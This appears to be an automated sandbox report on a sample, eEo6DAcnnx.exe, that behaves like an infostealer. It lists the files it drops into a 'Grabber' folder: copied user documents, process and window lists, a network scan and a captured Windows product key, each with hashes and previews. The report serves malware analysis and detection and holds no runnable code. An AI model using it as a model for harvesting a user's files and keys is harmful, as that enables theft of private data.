C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	21942
Entropy (8bit):	5.773274182774299
Encrypted:	false
SSDEEP:	96:O2XJSFGI9E8S8rC23C2qnijoRKMwPCwlH7x4R3cLMCxmPmF3snd/iNPjlFNjWMtu:/SFGvPnCP1Bmc6mA7s4qqR4HUqtjplt2
MD5:	FF0874010212683DA65F45E97D1078B4
SHA1:	FA90996D2BEA0F5DB00869E708FBFCA759F374C2
SHA-256:	428A71ED47A2D1627D1050DA39F85B047F5819187D05C17458C13242E7F69144
SHA-512:	DDC947F0D146E74DEFC4D5EC261462A710C5EE38A4A1C5C19A0C85BF26696D8E1EFD93E8AAFF40013F9A7597E8FEDD235BECEB1939A59C6E78ED10229F492D52
Malicious:	false
Preview:	NAME: gnGqeVIGKWB..PID: 6464..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: spoolsv..PID: 2148..EXE: C:\Windows\System32\spoolsv.exe..NAME: gnGqeVIGKWB..PID: 6888..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: svchost..PID: 3008..EXE: C:\Windows\System32\svchost.exe..NAME: RuntimeBroker..PID: 4300..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: RuntimeBroker..PID: 2144..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: gnGqeVIGKWB..PID: 6884..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..PID: 5004..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: ctfmon..PID: 3676..EXE: C:\Windows\system32\ctfmon.exe..NAME: svchost..PID: 6016..EXE: C:\

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.8143719431796272
Encrypted:	false
SSDEEP:	3:zoBT/Sn:zoZS
MD5:	CD1DC994E7AE093B4D17688522E53E16
SHA1:	A00A74B5DC9711BCBB5D1B3A77713364FFF6DEA8
SHA-256:	2CD610D13B2709FE3620D0AC83089E7D2753390576F1B5319BC53418CBCA1E13
SHA-512:	73E5B460021DDA1D736D7648763CB1819333C38DD7AA246AF2DA53DD3F09749CB54DBE47A6E6A8FCBBEB1A223378DAA3F6989BFEED19170840BFA306C8A33E70
Malicious:	false
Preview:	DBPPW-PRNFK-Y2YRR-P43J9-KYHK7

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18481
Entropy (8bit):	5.707439116391457
Encrypted:	false
SSDEEP:	96:OnFhUtm8vCrbdZKQUdZdDKnYegS50AuRbazL8yUB/i4bQe6sLQSBbR72jG5u8Nl+:66HHSIk
MD5:	07EAAFCAFF2C4FBEB2719BCE56A7D788
SHA1:	F8597365227C9DBDFEAA034B262898B441D76A04
SHA-256:	62654C695B5B217A32AD86BF1BE3F9068230CFACE99E4440BB30E95434009EE2
SHA-512:	2187F7FB4663312B52725EFE5ED628DD83207753A151A1463C6EFA94A243588CD81D1E0B26B5E89D78AC69872AEFC8271431F024CA476B24AF858E82A4394F46
Malicious:	false
Preview:	NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 6888..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 5004..EXE: C:\Program Files 